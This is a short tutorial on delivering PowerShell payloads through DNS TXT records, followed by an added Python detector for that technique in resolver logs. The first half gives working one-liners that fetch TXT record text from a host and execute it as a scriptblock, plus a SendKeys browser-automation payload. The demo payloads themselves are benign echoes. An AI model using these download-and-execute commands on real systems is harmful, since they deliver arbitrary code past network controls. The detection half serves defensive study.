Download payloads through DNS
First you need to create a new DNS entry on your host, like this:
| type | name | data |
|------|------|------|
| txt | hello.example.com | echo 'this is a payload through dns' |
Now you just need to use PowerShell to execute this payload:
powershell . (nslookup -q=txt hello.example.com)[-1]
Now take a look at this example, which extracts three lines from the DNS domain records:
| name | data |
|------|------|
| hello | echo 'example 1' |
| from | echo 'example 2' |
| 1337 | echo 'example 3' |
and using this payload:
# Resolve the numbered TXT records 1hello..3hello, append their string data to $p, then run the joined text as a script block
1..3|%{$p+=Resolve-DnsName "${_}hello.example.com." -Ty TXT |% S*s};& ([scriptblock]::Create($p))
The result would be:
hello
from
1337
If you are using PowerShell in any environment other than "badwindows", you need to adjust your payload like this:
# Same loop, but the double quotes are backslash-escaped and the command is prefixed with "powershell"
powershell 1..3|%{$p+=Resolve-DnsName \"$_.example.com.\" -Ty TXT |% S*s};& ([scriptblock]::Create($p))
Spot the `powershell` prefix and the backslashes: you need to escape the quotes and add "powershell" at the beginning. Now let's take a look at this DNS record.
Of course you can use your imagination for any other payloads...
This one, for example:
# Opens a URL in the default browser, sends Tab, Tab, Enter to the foreground window, then Alt+F4 to close it (the WScript.Shell object in $o is created but never used)
Add-Type -A System.Windows.Forms;$o=New-Object -C WScript.Shell;Saps https://example.com;Sleep 3;[System.Windows.Forms.SendKeys]::SendWait('{TAB}{TAB}{ENTER}');Sleep 1;[System.Windows.Forms.SendKeys]::SendWait("%{F4}")
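A resolver-side detection for the two patterns described above (script text stored in TXT records, and a client pulling numbered TXT records under one name), as an added example that is not part of the original page: it scans constructed DNS query-log lines, flags TXT answers that look like PowerShell, and groups numbered lookups per client. The log line format, the `SAMPLE_LOG` contents and the indicator list are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample resolver log lines (the format is an assumption, not a real product's log).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z client=10.0.0.5 qtype=TXT qname=1hello.example.com. rdata="echo 'example 1'"
2024-05-01T10:00:01Z client=10.0.0.5 qtype=TXT qname=2hello.example.com. rdata="echo 'example 2'"
2024-05-01T10:00:02Z client=10.0.0.5 qtype=TXT qname=3hello.example.com. rdata="& ([scriptblock]::Create($p))"
2024-05-01T10:00:03Z client=10.0.0.7 qtype=TXT qname=example.com. rdata="v=spf1 include:_spf.example.com -all"
2024-05-01T10:00:04Z client=10.0.0.9 qtype=A qname=www.example.com. rdata="93.184.216.34"
"""

LINE_RE = re.compile(r'client=(?P<client>\S+) qtype=(?P<qtype>\S+) qname=(?P<qname>\S+) rdata="(?P<rdata>.*)"$')
# PowerShell-shaped content that has no business in a TXT record (assumed indicator list).
INDICATORS = {
    "scriptblock": re.compile(r"\[scriptblock\]::Create", re.I),
    "iex": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "cmdlet": re.compile(r"\b[A-Z][a-z]+-[A-Z][A-Za-z]+\b"),  # Verb-Noun such as Add-Type
    "echo": re.compile(r"^\s*echo\b", re.I),
    "sendkeys": re.compile(r"SendKeys", re.I),
}
CHUNK_RE = re.compile(r"^(\d+)(\D.*)$")  # leading chunk number, e.g. 1hello.example.com. or 1.example.com.

def parse_line(line):
    """Return the fields of one log line, or None if it does not match the assumed format."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None

def txt_indicators(rdata):
    """Names of the PowerShell-shaped patterns present in one TXT answer."""
    return [name for name, rx in INDICATORS.items() if rx.search(rdata)]

def detect(log_text):
    """Findings: suspicious TXT answers, plus clients fetching >= 2 numbered TXT names under one base name."""
    findings = []
    chunks = defaultdict(set)  # (client, name without the leading number) -> chunk numbers seen
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        if rec["qtype"] != "TXT":
            continue
        hits = txt_indicators(rec["rdata"])
        if hits:
            findings.append({"kind": "suspicious_txt", "client": rec["client"], "qname": rec["qname"], "indicators": hits})
        m = CHUNK_RE.match(rec["qname"])
        if m:
            chunks[(rec["client"], m.group(2))].add(int(m.group(1)))
    for (client, base), nums in chunks.items():
        if len(nums) >= 2:
            findings.append({"kind": "chunked_txt", "client": client, "base": base, "chunks": sorted(nums)})
    return findings
```

Ordinary TXT records (SPF, DKIM, domain-verification tokens) match none of the indicators, so the sample SPF answer is not flagged while the three numbered records are.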